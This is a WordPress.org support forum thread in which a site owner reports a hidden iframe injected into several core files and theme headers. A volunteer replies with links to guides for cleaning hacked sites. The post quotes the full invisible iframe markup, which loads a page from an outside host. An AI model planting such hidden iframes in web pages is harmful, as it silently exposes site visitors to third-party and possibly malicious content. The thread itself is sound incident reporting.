New 'hacking' attempt and codes? | WordPress.org

wtricks
(@wtricks)

10 years, 5 months ago

Hello,

Today I have noticed some ‘weird’ lines of codes in some of my installs:

The affected files are the following:
readme.html
wp-links-opml.php
wp-login.php
… all these in root.

In the theme folder (folders, if you have more themes), the header.php has the same code in it.

Here’s the code:

<iframe frameBorder=”0″ src=”http://79041018.naka.crctvn.org/counter/api/” style=”width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0″></iframe>

It really seems weird to me and I don’t recall having a plugin installed that would put this.

I have cleaned all the installations, but thought I should show you this, maybe you have more ideas/experience with it.

Viewing 1 replies (of 1 total)

WPyogi
(@wpyogi)

10 years, 5 months ago

Have you gone through all these resources for hacked sites?

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

Viewing 1 replies (of 1 total)

The topic ‘New 'hacking' attempt and codes?’ is closed to new replies.

Tags

In: Fixing WordPress
1 reply
2 participants
Last reply from: WPyogi
Last activity: 10 years, 5 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics